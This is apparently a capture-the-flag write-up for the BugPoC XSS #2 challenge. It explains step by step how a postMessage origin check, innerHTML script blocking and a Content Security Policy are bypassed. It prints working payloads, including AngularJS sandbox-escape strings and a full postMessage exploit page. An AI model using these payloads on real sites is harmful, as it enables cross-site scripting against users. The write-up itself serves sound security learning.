Bug Poc XSS #2 Challenge Writeup

4 years ago 254

osama alaa

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This is a challenge made by BugPOC and it has a program in hackerone , and this is the link of challenge :

I tried to explain the challenge step by step even there are some basics .

Must alert(domain)Must bypass CSP,Must work in Chrome,Must provide a BugPoC demo

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First we need to see the view the html source so we can understand it:


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I also did a dynamic analysis with chrome debugger , it isn’t necessary for this challenge as it has few sources , but this concept is very important specially for huge files .

Break point in the postmessage

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When we write any number , this number will be sent to iframe using postmessage and is written on the calculator

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The reciever for postmessage will check the origin and extract message and check for its content before writing it.

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So now we have PostMessage that can be converted into XSS .

We need first to know a bit about PostMessage

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So , postMessage allow communications between a page “source” and another page “destination” , so index.html can communicate with frame.html through postMessage .

The Syntax for the source is :

targetWindow.postMessage(message, targetOrigin, [transfer]);

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so we have three important attributes :
1. targetwindow : which is the destination , in out example we have frame.html

2. message : which the message to be sent and will be received in the destination .

3. targetorigin : which could be * to allow communication with any target .

The syntax for Destination :

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we have to do a listener which will receive the message in certain condition like verifying the origin for security reasons .

Let’s try to do small tutorial regarding postmessage using the challenge code.
I hosted the challenge on my server so that I can bypass restrictions one by one .

First restriction is the origin :

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This is simple html to postmessage in the frame.html:

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so we can test it from another origin rather than my domain ctf.io and see if the message will be printed in the body of frame.html or not .

we can see that the body of frame.html is still 0 not ‘test’ which we have sent :

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We can remove the origin check and verify that again :

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we can see that ‘test’ message has been written in the body :

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So we need to bypass this check , we can notice that the regex is check for the beginning of the domain not the end , so if we can make a subdomain with name of “ctf.io” .
So , we can run our html from ctf.io.attacker.io .

Using the original script :

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we can bypass the origin :

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Now we can try to put simple html tags like <img src=x onerror=alert(1)>

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The image tag worked but with no javascript execution :

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There is Content Security Policy , so we can check for it using

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This means that we can load scripts from the challenge origin and also execute eval function .

Now we can try to send a message as script tag :
<script src="script.js"></script>

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but script.js hasn’t been fetched :

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After search I found that innerHTML doesn’t execute script tags :

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This was for security reasons :

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This is the second restriction we need to bypass .

So we need to do something like encapsulation , means to encapsulate our script tag in another tag which doesn’t annoy innerHTML :D

The best tag which carry any thing is iframe :D

But if we try to make the src of iframe to be another domain, this means the XSS will be executed in the other domain to the challenge domain .

Iframe also has great attribute that can be used is srcdoc instead of src attribute :

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This attribute can carry the HTML including script tags and be written in the body using innerHTML , so we can do something like that :
<iframe srcdoc="<html><script src=script.js></script></html>"></iframe>

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so , we can load the script.js from the ctf.io as shown:

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Now , we need to execute javascript using self-src bypassing CSP.

After search , I found that can be done using anguler sandbox escape to get XSS via this article:

I decided at last to use this payload , which I didn’t have no idea about its syntax :D

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I need to simplify the html so that I can understand how it works , as there will be another restriction.

By using this HTML :

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and when I click on “foo” , the alert is poped up:

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This payload contains quotes and double quotes which will make restriction as we will put this payload in srcdoc of iframe , and the iframe is put in the message variable , it will be like that :
var message='<iframe srcdoc="payload"></iframe>'

so payload doesn’t have to contain and double quotes as it will break the srcdoc , and also the message variable also , because of the restriction in frame.js which prevents using 'or & :

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So our payload must be free of ' , " , and & .

At this time I should understand the payload to see how to bypass this restriction , so I need to know a bit angular which I don’t anything except {{2*2}} :D

When I tried to remove ng-app , the payload is broken , I didn’t that it was important so I realized that, I have to read documentation :D

There is something called directive components , we used four of them :

ng-app :

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2. ng-focus

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3. ng-repeat

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4. ng-if

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This is simple illustration of the payload as I understood

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First problem from me is the ng-repeat as it uses " and ng-if as it uses ",'

I was also need to know why this makes alert , so I began to discover what is the values of key,value of the event focus , so I modify the payload to print the key:value

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so when the key=window , its value will be $window :

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so the most important thing that search for key which value is window .

I tried to access the window without this looping and if condition :

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Then I got what I need :

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so we can craft our payload without any quotes :

var message='<iframe srcdoc="<html><script src=angular.min.js></script><div ng-app><div ng-focus=x=$event; id=f tabindex=0>foo</div>{{[1].reduce(x.view.self.alert, 1); }}</div></div></div></html>"></iframe><iframe>';

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and it worked but alert(1)

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we need to make it alert document.domain , I spent a time to explore how to do that , but I can’t access document.domain as it always undefined ,so I used eval to generate alert(document.domain) from String.fromCharCode function .

To do this using angular , we can use [].constructor.name.constructor to represent string as I can’t access String :

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so I have to define a variable xss :


and use eval to execute it :

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The payload worked successfully

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Let’s try to use exploit the challenge itself , we will need to change the url to :
http://calc.buggywebsite.com/frame.html , and make subdomain calc.buggywebsite.com

This will be final exploit :

<iframe id="VulnerableSiteIframe" height="400" width="1024" src="http://calc.buggywebsite.com/frame.html" onload="SendMessage()"></iframe>
function SendMessage() {
var IframeElement = document.getElementById('VulnerableSiteIframe');
var message='<iframe srcdoc="<html><script src=angular.min.js>\<\/script><div ng-app><div ng-focus=x=$event; id=f tabindex=0>foo{{xss=[].constructor.name.constructor.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41);[1].reduce(x.view.self.eval, xss); }}</div></div></div></html>"></iframe>';
IframeElement.contentWindow.postMessage(message, '*');

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There is also another payload that can be worked , and easier than what I did

</body ng-app ><div ng-app ng-csp>{{l=[].constructor.name.constructor.fromCharCode(120,61,49,125,32,125,32,125,59,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,47,47);a=toString().constructor.prototype;a.charAt=a.trim;$eval(l)}}</div>

It is a famous one , I tried it but didn’t work at first time , but it worked at the end , so I put it in the poc , as it has no user interaction

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Thanks for reading .

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